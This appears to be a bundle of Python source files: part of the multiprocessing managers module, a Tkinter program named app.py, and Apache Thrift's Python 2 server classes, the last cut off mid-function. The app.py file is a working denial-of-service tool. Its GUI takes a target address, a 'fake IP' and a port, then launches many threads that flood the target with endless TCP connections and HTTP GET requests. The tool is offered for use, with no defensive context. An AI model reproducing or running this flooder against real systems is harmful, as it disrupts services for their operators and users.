def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
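# Editor's note -- illustrative sketch, not part of the original module. Concrete
# proxy classes below simply forward calls through _callmethod; a hypothetical
# counter proxy would look like:
#
#     class CounterProxy(BaseProxy):
#         _exposed_ = ('increment', 'value')
#         def increment(self):
#             return self._callmethod('increment')
#         def value(self):
#             return self._callmethod('value')
#
# which mirrors how AcquirerProxy, EventProxy, etc. are written further down.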
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
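# Editor's note -- illustrative sketch. MakeProxyType generates the same kind of
# forwarding class without writing it by hand; 'CounterProxy' is hypothetical:
#
#     CounterProxy = MakeProxyType('CounterProxy', ('increment', 'value'))
#
# The resulting BaseProxy subclass has increment()/value() methods that call
# self._callmethod('increment') / self._callmethod('value').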
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True, manager_owned=False):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref, manager_owned=manager_owned)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = time.monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - time.monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
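# Editor's note -- illustrative usage, not part of the original module. The
# registrations above back the familiar multiprocessing.Manager() API:
#
#     from multiprocessing import Manager
#     with Manager() as m:                  # Manager() returns a started SyncManager
#         shared_list = m.list([1, 2, 3])   # ListProxy
#         shared_dict = m.dict(a=1)         # DictProxy
#         ns = m.Namespace(x=10)            # NamespaceProxy
#         shared_list.append(4)             # call forwarded to the manager process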
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
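# Editor's note -- illustrative usage, not part of the original module:
#
#     from multiprocessing.managers import SharedMemoryManager
#     with SharedMemoryManager() as smm:
#         sl = smm.ShareableList(range(5))   # backed by a shared memory block
#         buf = smm.SharedMemory(size=1024)  # raw shared memory segment
#     # on exit the manager unlinks every segment it was tracking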
|
app.py
|
from tkinter import *
from tkinter.ttk import Combobox
import tkinter.messagebox
import threading
import socket
import time
class Dos:
def __init__(self,root):
self.root=root
self.root.title("DOS ATTACK")
self.root.geometry("450x400")
self.root.iconbitmap("logo980.ico")
self.root.resizable(0,0)
port=IntVar()
target_address=StringVar()
fake_ip=StringVar()
attackrange=IntVar()
def clear():
fake_ip.set("")
target_address.set("")
port.set("Select Port Number")
attackrange.set("Select Attack Range")
def attack():
try:
if target_address.get()!="":
if fake_ip.get()!="":
if port.get()!="Select Port Number":
if attackrange.get()!="Select Attack Range":
while True:
stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
stream.connect((target_address.get(),port.get()))
stream.sendto((f"GET /{target_address.get()} HTTP/1.1\r\n").encode("ascii"),(target_address.get(),port.get()))
stream.sendto((f"Host: {fake_ip.get()}\r\n\r\n").encode('ascii'),(target_address.get(),port.get()))
stream.close()
else:
tkinter.messagebox.showerror("Error","Please Select Attack Range")
else:
tkinter.messagebox.showerror("Error","Please Select the port number")
else:
tkinter.messagebox.showerror("Error","Please Enter A correct Fake Address")
else:
tkinter.messagebox.showerror("Error","Please Enter A correct Target Address")
except Exception as e:
tkinter.messagebox.showerror("Error",e)
def thread_attack():
x=attackrange.get()
for i in range(x):
thread=threading.Thread(target=attack)
time.sleep(4)
thread.start()
#================mainframe===============================#
mainframe=Frame(self.root,width=450,height=400,relief="ridge",bd=3)
mainframe.place(x=0,y=0)
firstframe=Frame(mainframe,width=444,height=340,relief="ridge",bd=3,bg="gray77")
firstframe.place(x=0,y=0)
secondframe=Frame(mainframe,width=444,height=53,relief="ridge",bd=3,bg="gray77")
secondframe.place(x=0,y=340)
#=====================firstframe==================================#
lab_target_ip=Label(firstframe,text="Enter Target IP Address",font=('times new roman',14),bg="gray77")
lab_target_ip.place(x=120,y=4)
ent_target_ip=Entry(firstframe,width=38,font=('times new roman',12),relief="ridge",bd=3,textvariable=target_address)
ent_target_ip.place(x=60,y=40)
lab_fake_ip=Label(firstframe,text="Enter Fake IP Address",font=('times new roman',14),bg="gray77")
lab_fake_ip.place(x=120,y=100)
ent_fake_ip=Entry(firstframe,width=38,font=('times new roman',12),relief="ridge",bd=3,textvariable=fake_ip)
ent_fake_ip.place(x=60,y=140)
ports=["80","20","21","22","23","25","50","51","53","67","68","69","110",\
"119","123","135","139","143","161","162","389","443","989","990","3389"]
ports_combo=Combobox(firstframe,values=ports,font=('arial',14),width=20,state="readonly",textvariable=port)
ports_combo.set("Select Port Number")
ports_combo.place(x=90,y=200)
attack_range=list(range(100,1000,5))
attack_range_combo=Combobox(firstframe,values=attack_range,font=('arial',14),width=20,state="readonly",textvariable=attackrange)
attack_range_combo.set("Select Attack Range")
attack_range_combo.place(x=90,y=260)
#=====================secondframe=================================#
but_Attack=Button(secondframe,width=17,text="Attack",font=('times new roman',12),cursor="hand2",command=thread_attack)
but_Attack.place(x=20,y=7)
but_Clear=Button(secondframe,width=17,text="Clear",font=('times new roman',12),cursor="hand2",command=clear)
but_Clear.place(x=250,y=7)
if __name__ == "__main__":
root=Tk()
Dos(root)
root.mainloop()
|
TServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import Queue
import logging
import os
import sys
import threading
import traceback
from thrift.Thrift import TProcessor
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
class TServer:
"""Base interface for a server, which must have a serve() method.
Three constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
"""
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
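# Editor's note -- illustrative usage, not part of the original module; assumes a
# Thrift-generated `processor` object and the standard TSocket transport:
#
#     from thrift.transport import TSocket
#     transport = TSocket.TServerSocket(port=9090)
#     server = TSimpleServer(processor, transport)
#     server.serve()   # blocks, servicing one client connection at a time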
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
except KeyboardInterrupt:
raise
except Exception, x:
logging.exception(x)
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
"""Server with a fixed size pool of threads which service requests."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.clients = Queue.Queue()
self.threads = 10
self.daemon = kwargs.get("daemon", False)
def setNumThreads(self, num):
"""Set the number of worker threads that should be created"""
self.threads = num
def serveThread(self):
"""Loop around getting clients from the shared queue and process them."""
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception, x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
for i in range(self.threads):
try:
t = threading.Thread(target=self.serveThread)
t.setDaemon(self.daemon)
t.start()
except Exception, x:
logging.exception(x)
# Pump the socket for clients
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
self.clients.put(client)
except Exception, x:
logging.exception(x)
class TForkingServer(TServer):
"""A Thrift server that forks a new process for each request
This is more scalable than the threaded server as it does not cause
GIL contention.
Note that this has different semantics from the threading server.
Specifically, updates to shared variables will no longer be shared.
It will also not work on Windows.
This code is heavily inspired by SocketServer.ForkingMixIn in the
Python stdlib.
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.children = []
def serve(self):
def try_close(file):
try:
file.close()
except IOError, e:
logging.warning(e, exc_info=True)
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
try:
pid = os.fork()
if pid: # parent
# add before collect, otherwise you race w/ waitpid
self.children.append(pid)
self.collect_children()
# Parent must close socket or the connection may not get
# closed promptly
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
try_close(itrans)
try_close(otrans)
else:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
